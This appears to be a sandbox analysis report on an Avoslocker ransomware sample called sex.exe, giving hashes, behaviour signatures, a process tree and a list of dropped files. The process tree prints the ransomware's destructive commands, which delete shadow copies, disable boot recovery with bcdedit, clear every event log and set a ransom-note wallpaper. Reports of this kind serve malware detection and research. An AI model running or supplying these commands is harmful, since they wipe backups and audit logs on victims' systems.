Overview

overview

10

Static

static

3

sex.exe

windows7-x64

10

sex.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    94s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-12-2024 00:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sex.exe

  • Size

    1.6MB

  • MD5

    6bd9e9d6f55a5491d8b24768023ab9d7

  • SHA1

    2a5c3b978530bb2cdc981ccf52dd58a41010bc4e

  • SHA256

    7859dd2f4c9797122bfe2097c5d17279c4050471c67110f95906ac152fec76a2

  • SHA512

    1cd39b1d85bd9ae6d1399cd8d0e4d878b0602cd068750bb349b9c6d143d571baaab81e559e1f8cfb769ad5e1b1e0aad605b1f912ca768c554229215e218f8e18

  • SSDEEP

    24576:1Imw98okVgela0as5CqLVO7XJCjkD3N0HRAxV0aEhbHdn0TrldepPZ:LL5ljasaUKeaEhDF

Score
10/10
avoslockerdefense_evasiondiscoveryevasionexecutionimpactransomwarespywarestealerupx

Malware Config

Signatures

  • Avoslocker Ransomware

    Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.

    ransomwareavoslocker
  • Avoslocker family
    avoslocker
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Renames multiple (8510) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\sex.exe
    "C:\Users\Admin\AppData\Local\Temp\sex.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3236
    • C:\Users\Admin\AppData\Local\Temp\hack.exe
      "C:\Users\Admin\AppData\Local\Temp\hack.exe"
      2⤵
      • Executes dropped EXE
      • Drops desktop.ini file(s)
      • Enumerates connected drives
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4892
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c wmic shadowcopy delete /nointeractive
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3508
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic shadowcopy delete /nointeractive
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:53312
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3696
        • C:\Windows\system32\vssadmin.exe
          vssadmin.exe Delete Shadows /All /Quiet
          4⤵
          • Interacts with shadow copies
          PID:37348
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c bcdedit /set {default} recoveryenabled No
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3440
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled No
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:37332
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1408
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} bootstatuspolicy ignoreallfailures
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:37340
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4260
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:53304
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:17684
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1742801547.png /f
          4⤵
          • Sets desktop wallpaper using registry
          PID:18428
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
          4⤵
            PID:18600
      • C:\Users\Admin\AppData\Local\Temp\Firefox Installer.exe
        "C:\Users\Admin\AppData\Local\Temp\Firefox Installer.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:17708
        • C:\Users\Admin\AppData\Local\Temp\7zSC25D5609\setup-stub.exe
          .\setup-stub.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:18000
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 18000 -s 2492
            4⤵
            • Program crash
            PID:19252
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:53512
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 18000 -ip 18000
      1⤵
        PID:19208

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\GET_YOUR_FILES_BACK.txt
        Filesize

        1011B

        MD5

        c92c2b70fb37f84aab38412ad9226aa8

        SHA1

        14f2e9a83285612d0a7b2c83b8f89bccfde6c154

        SHA256

        d64639e873c0873b469cd856d1ef4bce7dc14a80fac6fe2bed9d629f05acc77f

        SHA512

        04f9dcb3cd49909712535255b6eadd7fafcb2902bf1abd5a25e9bb5f5c4dc032611aec0a5b0ec89cd7dbc65276b935c54b906b391507d2e3e3aa65466b15f848

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        6cf293cb4d80be23433eecf74ddb5503

        SHA1

        24fe4752df102c2ef492954d6b046cb5512ad408

        SHA256

        b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

        SHA512

        0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        eb6332ae9e8fec69c2236355e2638f9d

        SHA1

        71500d57fb304979afd6756f06d4b9a59f995eb7

        SHA256

        88e5ffe18fd4a772efce68f1b0db839846cafc42d36415508ad5356a44d38f32

        SHA512

        e87c864ba79bd7a10a62b55ad564cf3acb090e7d85707a6967497deeef5fcde1f0b4608ea8791bf81363ec583a0101d470d8f3cd2172ced8d4071d7f6c674aed

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\7zSC25D5609\setup-stub.exe
        Filesize

        630KB

        MD5

        ea482758c49d3c0064c6a40e797ab046

        SHA1

        e93f077ca6fd640e28eb9bd692f44d57ed96fa1a

        SHA256

        8c6eb21ff36dcb4b2adcf556039a9ef518a3e25a1fa02bd2b8d5d8ecd344d06c

        SHA512

        f950457146fa6de0eddfb8219b782f019d97b45a6b2d6fb66e6f3fed28b62a15c86cd22c96a3e402b06c6bb7f14c923925e2abb7e49422dcc7e2b681b7c1c3da

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Firefox Installer.exe
        Filesize

        364KB

        MD5

        530894a1f0eb42c7837db4d74829f5c6

        SHA1

        99909db6f574ca964a9b822b9b19fd2e851b8c1e

        SHA256

        aac3ce797f50e0a5b9f1b43aaaffb439d4c42e3cf5b9fbeac52fa3d263fde3d0

        SHA512

        0836dd919c5f5648ce3445f9a3c84afe5e1e694ff998f1204498b2a86b13ed297469bea88af0ad7e49c97cd57153c7c43fd0a311b4c2685f4dfca5574d1d10f0

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jleirbcq.sc5.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\hack.exe
        Filesize

        807KB

        MD5

        e27b5291c8fb2dfdeb7f16bb6851df5e

        SHA1

        40207f83b601cd60905c1f807ac0889c80dfe33f

        SHA256

        ffd933ad53f22a0f10cceb4986087258f72dffdd36999b7014c6b37c157ee45f

        SHA512

        2ddbc50cd780ffbf73c354b9b437322eb49cb05bb6f287d54e7dcafb61dc4c4549e37ae2f972f3d240bfa7d2ca485b7583137f1bf038bc901f378cea0c305c6a

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\nsa13F1.tmp\CityHash.dll
        Filesize

        53KB

        MD5

        2021acc65fa998daa98131e20c4605be

        SHA1

        2e8407cfe3b1a9d839ea391cfc423e8df8d8a390

        SHA256

        c299a0a71bf57eb241868158b4fcfe839d15d5ba607e1bdc5499fdf67b334a14

        SHA512

        cb96d3547bab778cbe94076be6765ed2ae07e183e4888d6c380f240b8c6708662a3b2b6b2294e38c48bc91bf2cc5fc7cfcd3afe63775151ba2fe34b06ce38948

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\nsa13F1.tmp\InetBgDL.dll
        Filesize

        95KB

        MD5

        af9e2d138cf17b8ff4d4b8df7fddaefa

        SHA1

        539afa302bc5cae7022896048cb7a0f3f2ab6907

        SHA256

        3921dec014fadd1de7f3a36606ac95882a17cb96df38a5424e58531a169f825b

        SHA512

        631ad8bbb9eea42b230f2729714874c921677c4be91ac0b35ab9e7751613045eb249f8a0dd1d5ce06bf2cd544507795836dcbf42be79f01a71333570ea27c840

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\nsa13F1.tmp\System.dll
        Filesize

        22KB

        MD5

        b361682fa5e6a1906e754cfa08aa8d90

        SHA1

        c6701aee0c866565de1b7c1f81fd88da56b395d3

        SHA256

        b711c4f17690421c9dc8ddb9ed5a9ddc539b3a28f11e19c851e25dcfc7701c04

        SHA512

        2778f91c9bcf83277d26c71118a1ccb0fb3ce50e89729f14f4915bc65dd48503a77b1e5118ce774dea72f5ce3cc8681eb9ca3c55cf90e9f61a177101ba192ae9

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\nsa13F1.tmp\UAC.dll
        Filesize

        28KB

        MD5

        d23b256e9c12fe37d984bae5017c5f8c

        SHA1

        fd698b58a563816b2260bbc50d7f864b33523121

        SHA256

        ec6a56d981892bf251df1439bea425a5f6c7e1c7312d44bedd5e2957f270338c

        SHA512

        13f284821324ffaeadafd3651f64d896186f47cf9a68735642cf37b37de777dba197067fbccd3a7411b5dc7976e510439253bd24c9be1d36c0a59d924c17ae8e

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\nsa13F1.tmp\UserInfo.dll
        Filesize

        14KB

        MD5

        610ad03dec634768cd91c7ed79672d67

        SHA1

        dc8099d476e2b324c09db95059ec5fd3febe1e1e

        SHA256

        c6c413108539f141bea3f679e0e2ef705898c51ec7c2607f478a865fc5e2e2df

        SHA512

        18c3c92be81aadfa73884fe3bdf1fce96ccfbd35057600ef52788a871de293b64f677351ba2885c6e9ce5c3890c22471c92832ffc13ba544e9d0b347c5d33bfd

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\nsa13F1.tmp\WebBrowser.dll
        Filesize

        103KB

        MD5

        b53cd4ad8562a11f3f7c7890a09df27a

        SHA1

        db66b94670d47c7ee436c2a5481110ed4f013a48

        SHA256

        281a0dc8b4f644334c2283897963b20df88fa9fd32acca98ed2856b23318e6ec

        SHA512

        bb45d93ed13df24a2056040c219cdf36ee44c8cddb7e178fdaabcec63ac965e07f679ca1fa42591bba571992af619aa1dc76e819a7901709df79598a2b0cef81

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\nsa13F1.tmp\profile_cleanup.html
        Filesize

        1KB

        MD5

        1cb97b5f8c5f2728b26742d1d0669899

        SHA1

        bb5ab1b8c00810fcb18184a996573c5accdc72c3

        SHA256

        dec82e9caa154300e1aa44f550c16b455a2025be4fb1c3155cb75fe04a6b6611

        SHA512

        768ed2b070485f3bbcf457aefdc0ef8f1737ad8ac4a2703e2feaff424f9a2c69a2f5928a3be898932ef4976a44ea829a099d090bd9941a24d045d5c8ac8b7b43

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\nsa13F1.tmp\profile_cleanup.js
        Filesize

        1KB

        MD5

        d845e8f4c0edb3cab17e6a30090ac5b8

        SHA1

        654f058570f0868f0acc5f0595147f3385a9c265

        SHA256

        1adcfdd9768242c6c639b10e4f0bcda24f6a957a169c1dede265e40336ecbd4f

        SHA512

        401d800c484b74401b90c3285d8b6cc0018baf4979d6ec7bb174f7810d3f60adfa6b4cebeafcee20d5a7c3597447f755af19c5fecf1863e2438fe427dbdf9fed

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\nsa13F1.tmp\stub_common.js
        Filesize

        815B

        MD5

        efce3dce0165b3f6551db47e5c0ac8d6

        SHA1

        1e15f6bb688e3d645092c1aa5ee3136f8de65312

        SHA256

        dab39cbae31848cce0b5c43fddd2674fef4dea5b7a3dacdaabdc78a8a931817e

        SHA512

        cec12da07f52822aaed340b1b751153efa43e5c3d747fa39f03bb2800bf53e9416020d654a818a6088acb2cf5581714433d818537f04af150e6bfb6861c03988

        Download Submit

      • memory/3236-17814-0x00007FF65A5B0000-0x00007FF65A749000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/3236-22825-0x00007FF65A5B0000-0x00007FF65A749000-memory.dmp

        Filesize

        1.6MB

        Download

      • memory/17708-22735-0x0000000000400000-0x0000000000446000-memory.dmp

        Filesize

        280KB

        Download

      • memory/17708-22824-0x0000000000400000-0x0000000000446000-memory.dmp

        Filesize

        280KB

        Download

      • memory/53304-17354-0x0000024EF5E30000-0x0000024EF5E52000-memory.dmp

        Filesize

        136KB

        Download